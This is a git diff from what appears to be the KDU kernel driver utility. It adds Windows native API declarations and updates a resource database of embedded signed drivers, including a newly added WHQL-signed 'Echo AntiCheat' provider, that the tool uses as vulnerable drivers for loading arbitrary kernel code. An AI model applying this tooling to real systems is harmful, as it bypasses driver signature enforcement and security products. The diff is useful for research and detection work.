- PHANDLEENTRY aheList;
- ULONG HeEntrySize;
- // incomplete
-} SHAREDINFO, *PSHAREDINFO;
-
-typedef struct _USERCONNECT {
- ULONG ulVersion;
- ULONG ulCurrentVersion;
- DWORD dwDispatchCount;
- SHAREDINFO siClient;
-} USERCONNECT, *PUSERCONNECT;
-
-/*
-* WIN32K OBJECTS END
-*/
-
-
/*
** Runtime Library API START
*/
@@ -9259,7 +9306,7 @@ NtRaiseException(
_In_ BOOLEAN FirstChance);
__analysis_noreturn
-NTSYSCALLAPI
+NTSYSAPI
VOID
NTAPI
RtlAssert(
@@ -9277,6 +9324,22 @@ RtlAssert(
#define RTL_SOFT_ASSERTMSG(_msg, _exp) \
((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n Message: %s\n", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE)
+typedef ULONG(NTAPI* PRTLP_UNHANDLED_EXCEPTION_FILTER)(
+ _In_ PEXCEPTION_POINTERS ExceptionInfo
+ );
+
+NTSYSAPI
+VOID
+NTAPI
+RtlSetUnhandledExceptionFilter(
+ _In_ PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter);
+
+NTSYSAPI
+LONG
+NTAPI
+RtlUnhandledExceptionFilter(
+ _In_ PEXCEPTION_POINTERS ExceptionPointers);
+
/************************************************************************************
*
* RTL Security API.
@@ -9836,6 +9899,32 @@ RtlAdjustPrivilege(
_In_ BOOLEAN Client,
_Out_ PBOOLEAN WasEnabled);
+#define RTL_ACQUIRE_PRIVILEGE_REVERT 0x00000001
+#define RTL_ACQUIRE_PRIVILEGE_PROCESS 0x00000002
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlAcquirePrivilege(
+ _In_ PULONG Privilege,
+ _In_ ULONG NumPriv,
+ _In_ ULONG Flags,
+ _Out_ PVOID* ReturnedState);
+
+NTSYSAPI
+VOID
+NTAPI
+RtlReleasePrivilege(
+ _In_ PVOID StatePointer);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+RtlRemovePrivileges(
+ _In_ HANDLE TokenHandle,
+ _In_ PULONG PrivilegesToKeep,
+ _In_ ULONG PrivilegeCount);
+
NTSYSAPI
BOOLEAN
NTAPI
@@ -14244,6 +14333,22 @@ NtRemoveProcessDebug(
_In_ HANDLE ProcessHandle,
_In_ HANDLE DebugObjectHandle);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtQueryDebugFilterState(
+ _In_ ULONG ComponentId,
+ _In_ ULONG Level);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtSetDebugFilterState(
+ _In_ ULONG ComponentId,
+ _In_ ULONG Level,
+ _In_ BOOLEAN State);
+
+
/************************************************************************************
*
* Profile API.
@@ -14318,6 +14423,114 @@ NtSetIntervalProfile(
_In_ ULONG Interval,
_In_ KPROFILE_SOURCE Source);
+/************************************************************************************
+*
+* Signing Levels API.
+*
+************************************************************************************/
+typedef UCHAR SE_SIGNING_LEVEL, * PSE_SIGNING_LEVEL;
+
+#ifndef SE_SIGNING_LEVEL_UNCHECKED
+#define SE_SIGNING_LEVEL_UNCHECKED 0x00000000
+#endif
+
+#ifndef SE_SIGNING_LEVEL_UNSIGNED
+#define SE_SIGNING_LEVEL_UNSIGNED 0x00000001
+#endif
+
+#ifndef SE_SIGNING_LEVEL_ENTERPRISE
+#define SE_SIGNING_LEVEL_ENTERPRISE 0x00000002
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_1
+#define SE_SIGNING_LEVEL_CUSTOM_1 0x00000003
+#endif
+
+#ifndef SE_SIGNING_LEVEL_DEVELOPER
+#define SE_SIGNING_LEVEL_DEVELOPER SE_SIGNING_LEVEL_CUSTOM_1
+#endif
+
+#ifndef SE_SIGNING_LEVEL_AUTHENTICODE
+#define SE_SIGNING_LEVEL_AUTHENTICODE 0x00000004
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_2
+#define SE_SIGNING_LEVEL_CUSTOM_2 0x00000005
+#endif
+
+#ifndef SE_SIGNING_LEVEL_STORE
+#define SE_SIGNING_LEVEL_STORE 0x00000006
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_3
+#define SE_SIGNING_LEVEL_CUSTOM_3 0x00000007
+#endif
+
+#ifndef SE_SIGNING_LEVEL_ANTIMALWARE
+#define SE_SIGNING_LEVEL_ANTIMALWARE SE_SIGNING_LEVEL_CUSTOM_3
+#endif
+
+#ifndef SE_SIGNING_LEVEL_MICROSOFT
+#define SE_SIGNING_LEVEL_MICROSOFT 0x00000008
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_4
+#define SE_SIGNING_LEVEL_CUSTOM_4 0x00000009
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_5
+#define SE_SIGNING_LEVEL_CUSTOM_5 0x0000000A
+#endif
+
+#ifndef SE_SIGNING_LEVEL_DYNAMIC_CODEGEN
+#define SE_SIGNING_LEVEL_DYNAMIC_CODEGEN 0x0000000B
+#endif
+
+#ifndef SE_SIGNING_LEVEL_WINDOWS
+#define SE_SIGNING_LEVEL_WINDOWS 0x0000000C
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_7
+#define SE_SIGNING_LEVEL_CUSTOM_7 0x0000000D
+#endif
+
+#ifndef SE_SIGNING_LEVEL_WINDOWS_TCB
+#define SE_SIGNING_LEVEL_WINDOWS_TCB 0x0000000E
+#endif
+
+#ifndef SE_SIGNING_LEVEL_CUSTOM_6
+#define SE_SIGNING_LEVEL_CUSTOM_6 0x0000000F
+#endif
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtSetCachedSigningLevel(
+ _In_ ULONG Flags,
+ _In_ SE_SIGNING_LEVEL InputSigningLevel,
+ _In_reads_(SourceFileCount) PHANDLE SourceFiles,
+ _In_ ULONG SourceFileCount,
+ _In_opt_ HANDLE TargetFile);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtGetCachedSigningLevel(
+ _In_ HANDLE File,
+ _Out_ PULONG Flags,
+ _Out_ PSE_SIGNING_LEVEL SigningLevel,
+ _Out_writes_bytes_to_opt_(*ThumbprintSize, *ThumbprintSize) PUCHAR Thumbprint,
+ _Inout_opt_ PULONG ThumbprintSize,
+ _Out_opt_ PULONG ThumbprintAlgorithm);
+
+//REDSTONE 2 and above
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCompareSigningLevels(
+ _In_ SE_SIGNING_LEVEL FirstSigningLevel,
+ _In_ SE_SIGNING_LEVEL SecondSigningLevel);
+
/************************************************************************************
*
* Worker Factory API.
@@ -14699,6 +14912,53 @@ NtRaiseHardError(
_In_ ULONG ValidResponseOptions,
_Out_ PULONG Response);
+/************************************************************************************
+*
+* Thread Pooling API and definitions.
+*
+************************************************************************************/
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+TpAllocPool(
+ _Out_ PTP_POOL* PoolReturn,
+ _Reserved_ PVOID Reserved);
+
+NTSYSAPI
+VOID
+NTAPI
+TpReleasePool(
+ _Inout_ PTP_POOL Pool);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+TpAllocWork(
+ _Out_ PTP_WORK* WorkReturn,
+ _In_ PTP_WORK_CALLBACK Callback,
+ _Inout_opt_ PVOID Context,
+ _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron);
+
+NTSYSAPI
+VOID
+NTAPI
+TpReleaseWork(
+ _Inout_ PTP_WORK Work);
+
+NTSYSAPI
+VOID
+NTAPI
+TpPostWork(
+ _Inout_ PTP_WORK Work);
+
+NTSYSAPI
+VOID
+NTAPI
+TpWaitForWork(
+ _Inout_ PTP_WORK Work,
+ _In_ LOGICAL CancelPendingCallbacks);
+
/************************************************************************************
*
* Application Verifier API and definitions.
diff --git a/Source/Shared/ntos/ntsup.c b/Source/Shared/ntos/ntsup.c
index e1558c9..348a62c 100644
--- a/Source/Shared/ntos/ntsup.c
+++ b/Source/Shared/ntos/ntsup.c
@@ -4,9 +4,9 @@
*
* TITLE: NTSUP.C
*
-* VERSION: 2.18
+* VERSION: 2.20
*
-* DATE: 18 Feb 2023
+* DATE: 14 Jul 2023
*
* Native API support functions.
*
@@ -842,7 +842,7 @@ PVOID ntsupGetSystemInfoEx(
&returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
FreeMem(buffer);
- bufferSize *= 2;
+ bufferSize <<= 1;
if (bufferSize > NTQSI_MAX_BUFFER_LENGTH)
return NULL;
@@ -1047,7 +1047,7 @@ BOOL ntsupQueryProcessName(
ULONG NextEntryDelta = 0;
union {
- PSYSTEM_PROCESSES_INFORMATION Processes;
+ PSYSTEM_PROCESS_INFORMATION Process;
PBYTE ListRef;
} List;
@@ -1057,18 +1057,18 @@ BOOL ntsupQueryProcessName(
List.ListRef += NextEntryDelta;
- if ((ULONG_PTR)List.Processes->UniqueProcessId == dwProcessId) {
+ if ((ULONG_PTR)List.Process->UniqueProcessId == dwProcessId) {
_strncpy(
Buffer,
ccBuffer,
- List.Processes->ImageName.Buffer,
- List.Processes->ImageName.Length / sizeof(WCHAR));
+ List.Process->ImageName.Buffer,
+ List.Process->ImageName.Length / sizeof(WCHAR));
return TRUE;
}
- NextEntryDelta = List.Processes->NextEntryDelta;
+ NextEntryDelta = List.Process->NextEntryDelta;
} while (NextEntryDelta);
@@ -1088,13 +1088,13 @@ BOOL ntsupQueryProcessName(
BOOL ntsupQueryProcessEntryById(
_In_ HANDLE UniqueProcessId,
_In_ PVOID ProcessList,
- _Out_ PSYSTEM_PROCESSES_INFORMATION* Entry
+ _Out_ PSYSTEM_PROCESS_INFORMATION* Entry
)
{
ULONG NextEntryDelta = 0;
union {
- PSYSTEM_PROCESSES_INFORMATION Processes;
+ PSYSTEM_PROCESS_INFORMATION Process;
PBYTE ListRef;
} List;
@@ -1106,12 +1106,12 @@ BOOL ntsupQueryProcessEntryById(
List.ListRef += NextEntryDelta;
- if (List.Processes->UniqueProcessId == UniqueProcessId) {
- *Entry = List.Processes;
+ if (List.Process->UniqueProcessId == UniqueProcessId) {
+ *Entry = List.Process;
return TRUE;
}
- NextEntryDelta = List.Processes->NextEntryDelta;
+ NextEntryDelta = List.Process->NextEntryDelta;
} while (NextEntryDelta);
diff --git a/Source/Shared/ntos/ntsup.h b/Source/Shared/ntos/ntsup.h
index c841821..1570444 100644
--- a/Source/Shared/ntos/ntsup.h
+++ b/Source/Shared/ntos/ntsup.h
@@ -4,9 +4,9 @@
*
* TITLE: NTSUP.H
*
-* VERSION: 2.18
+* VERSION: 2.19
*
-* DATE: 16 Feb 2023
+* DATE: 10 Jul 2023
*
* Common header file for the NT API support functions and definitions.
*
@@ -232,7 +232,7 @@ BOOL ntsupQueryProcessName(
BOOL ntsupQueryProcessEntryById(
_In_ HANDLE UniqueProcessId,
_In_ PVOID ProcessList,
- _Out_ PSYSTEM_PROCESSES_INFORMATION* Entry);
+ _Out_ PSYSTEM_PROCESS_INFORMATION* Entry);
NTSTATUS ntsupQueryProcessImageFileNameByProcessId(
_In_ HANDLE UniqueProcessId,
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index ba9842c..cc7c327 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -195,6 +195,7 @@
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index e5ae477..b8bd0c8 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -175,6 +175,9 @@
Resource Files
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/AsusCertService.bin b/Source/Tanikaze/data/AsusCertService.bin
index 4d5f0cb..8833525 100644
Binary files a/Source/Tanikaze/data/AsusCertService.bin and b/Source/Tanikaze/data/AsusCertService.bin differ
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index 0089059..7eff32b 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index dbc0ed2..8d7f158 100644
Binary files a/Source/Tanikaze/data/KMUSIG.bin and b/Source/Tanikaze/data/KMUSIG.bin differ
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index 4cfddfd..3210588 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index 1d88ce3..bde7f53 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 6df9520..6b1597a 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin
index 6e44f07..e7b5aca 100644
Binary files a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin and b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index 942f0bb..a8a21fa 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 3462c9c..e6dcd24 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index 1f8c071..af4ce32 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index 36b378d..ae4a555 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index f2696d9..75cf2fc 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index ee1bc1e..cc9e735 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index b561c00..84a51b4 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index c1333c8..b72021a 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index 1e37369..f3dbc3c 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index c783c14..6e0516e 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/KExplore.bin b/Source/Tanikaze/drv/KExplore.bin
index c298cce..16923c6 100644
Binary files a/Source/Tanikaze/drv/KExplore.bin and b/Source/Tanikaze/drv/KExplore.bin differ
diff --git a/Source/Tanikaze/drv/KObjExp.bin b/Source/Tanikaze/drv/KObjExp.bin
index cc8cbda..a04debd 100644
Binary files a/Source/Tanikaze/drv/KObjExp.bin and b/Source/Tanikaze/drv/KObjExp.bin differ
diff --git a/Source/Tanikaze/drv/KRegExp.bin b/Source/Tanikaze/drv/KRegExp.bin
index b7ebf22..f83ffe6 100644
Binary files a/Source/Tanikaze/drv/KRegExp.bin and b/Source/Tanikaze/drv/KRegExp.bin differ
diff --git a/Source/Tanikaze/drv/LDD.bin b/Source/Tanikaze/drv/LDD.bin
index ce2f580..dddbeda 100644
Binary files a/Source/Tanikaze/drv/LDD.bin and b/Source/Tanikaze/drv/LDD.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index 8ef38b5..77cebda 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index 51f97a9..8a817ae 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 934d009..1e179de 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 235e7a6..33e7ec4 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index af1b85a..c4c23ae 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 50c4862..b81c976 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index cd40a20..689b215 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index c5c7477..a2803a2 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 1c863f5..e3e0368 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/echo_driver.bin b/Source/Tanikaze/drv/echo_driver.bin
new file mode 100644
index 0000000..29b5510
Binary files /dev/null and b/Source/Tanikaze/drv/echo_driver.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 6ec1e62..67bd016 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/etdsupp.bin b/Source/Tanikaze/drv/etdsupp.bin
index 8c408cd..bc3988f 100644
Binary files a/Source/Tanikaze/drv/etdsupp.bin and b/Source/Tanikaze/drv/etdsupp.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index b456a6f..ddbe632 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index 782e357..aed9c3d 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/heavenluo.bin b/Source/Tanikaze/drv/heavenluo.bin
index 80eaf49..332020f 100644
Binary files a/Source/Tanikaze/drv/heavenluo.bin and b/Source/Tanikaze/drv/heavenluo.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index a493f01..89eee1c 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index 896ff00..29339a1 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index 70fedb4..e84075d 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index 3420a9e..8e7186a 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index 85fe6b7..45de007 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/pcdsrvc_x64.bin b/Source/Tanikaze/drv/pcdsrvc_x64.bin
index 55cfd2e..2a032ce 100644
Binary files a/Source/Tanikaze/drv/pcdsrvc_x64.bin and b/Source/Tanikaze/drv/pcdsrvc_x64.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
index d8c5c9d..5db080a 100644
Binary files a/Source/Tanikaze/drv/physmem.bin and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp1627.bin b/Source/Tanikaze/drv/procexp1627.bin
index ecc7c6e..ccfc5a4 100644
Binary files a/Source/Tanikaze/drv/procexp1627.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
index 1c19034..9d11662 100644
Binary files a/Source/Tanikaze/drv/procexp1702.bin and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index 4550290..07948d7 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index f6ad603..0a89e49 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -40,6 +40,7 @@
#define IDR_KEXPLORE 139
#define IDR_KOBJEXP 140
#define IDR_KREGEXP 141
+#define IDR_ECHODRV 143
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
@@ -52,7 +53,7 @@
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 142
+#define _APS_NEXT_RESOURCE_VALUE 144
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 868a769..9b9bf14 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -140,6 +140,8 @@ IDR_KOBJEXP RCDATA "drv\\KObjExp.bin"
IDR_KREGEXP RCDATA "drv\\KRegExp.bin"
+IDR_ECHODRV RCDATA "drv\\echo_driver.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -147,8 +149,8 @@ IDR_KREGEXP RCDATA "drv\\KRegExp.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,5,2306
- PRODUCTVERSION 1,1,5,2306
+ FILEVERSION 1,1,6,2307
+ PRODUCTVERSION 1,1,6,2307
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -165,12 +167,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.5.2306"
+ VALUE "FileVersion", "1.1.6.2307"
VALUE "InternalName", "Tanikaze.dll"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.5.2306"
+ VALUE "ProductVersion", "1.1.6.2307"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index d0787db..e0c7b6b 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.14
+* VERSION: 1.16
*
-* DATE: 10 Jun 2023
+* DATE: 15 Jul 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -608,6 +608,21 @@ KDU_DB_ENTRY gProvEntry[] = {
(LPWSTR)L"KRegExp",
(LPWSTR)L"KRegExp",
(LPWSTR)L"Pavel Yosifovich"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_ECHODRV,
+ KDU_PROVIDER_ECHODRV,
+ KDU_VICTIM_PE1702,
+ SourceBaseNone,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PREFER_VIRTUAL,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Echo AntiCheat",
+ (LPWSTR)L"EchoDrv",
+ (LPWSTR)L"EchoDrv",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
}
};